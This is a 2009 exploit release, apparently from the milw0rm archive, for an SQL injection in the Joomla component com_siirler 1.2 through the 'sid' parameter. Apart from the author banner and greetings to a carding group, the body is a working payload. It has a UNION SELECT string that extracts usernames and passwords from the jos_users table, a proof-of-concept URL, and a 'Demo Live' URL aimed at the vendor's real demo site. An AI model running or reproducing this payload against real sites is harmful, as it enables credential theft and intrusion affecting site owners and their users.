46 lines
No EOL
1.9 KiB
Text
46 lines
No EOL
1.9 KiB
Text
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
|
|
| |
|
|
| Joomla <= 1.5.x Component com_siirler 1.2 (sid) SQL Injection Vulnerability |
|
|
| |
|
|
| |
|
|
| =================[Author]================== |
|
|
| |
|
|
| [+] Founded : v3n0m |
|
|
| [+] Contact : v3n0m666[at]live[dot]com |
|
|
| [+] Blog : http://0wnage.wordpress.com/ |
|
|
| [+] Group : YOGYACARDERLINK |
|
|
| [+] Site : http://yogyacarderlink.web.id/ |
|
|
| [+] Date : August, 25th 2009 [INDONESIA] |
|
|
| |
|
|
| ================[Soft Info]================ |
|
|
| |
|
|
| Software: Siirler Bileseni |
|
|
| Version : 1.2 RC (Legacy) |
|
|
| Vendor : http://www.qproje.com/ |
|
|
| License : GNU/GPL |
|
|
| |
|
|
+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++
|
|
|
|
|
|
[-] Exploit:
|
|
[+] +and+1=2+union+select+concat(username,char(58),password)+from+jos_users--
|
|
|
|
[-] SQLi p0c:
|
|
[+] http://localhost/[path]/index.php?option=com_siirler&task=sdetay&sid=[xxx]+and+1=2+union+select+concat(username,char(58),password)+from+jos_users--
|
|
[xxx] = Valid sid number
|
|
|
|
[+] Demo Live:
|
|
[-] http://demo.qproje.com/j15x/index.php?option=com_siirler&task=sdetay&sid=364+and+1=2+union+select+concat(username,char(58),password)+from+jos_users--
|
|
|
|
|
|
===========================
|
|
[+] Greetz & Thanks [+]
|
|
===========================
|
|
RedLine Crew : Bang Musa,Mas Andre,Dagol,Yazid,Ogie
|
|
YOGYACARDERLINK : leQhi,lingah,-Jali,Anak_Naga_,g0nz,IdioT_InsidE,
|
|
aRiee,yoga0400,ghareng,eidelweiss,pKi,kaka11
|
|
|
|
g0t inspiration in my bedroom when i was flashback my mind about jogja & jovita
|
|
PROUD TO BE INDONESIAN-
|
|
|
|
# milw0rm.com [2009-08-25] |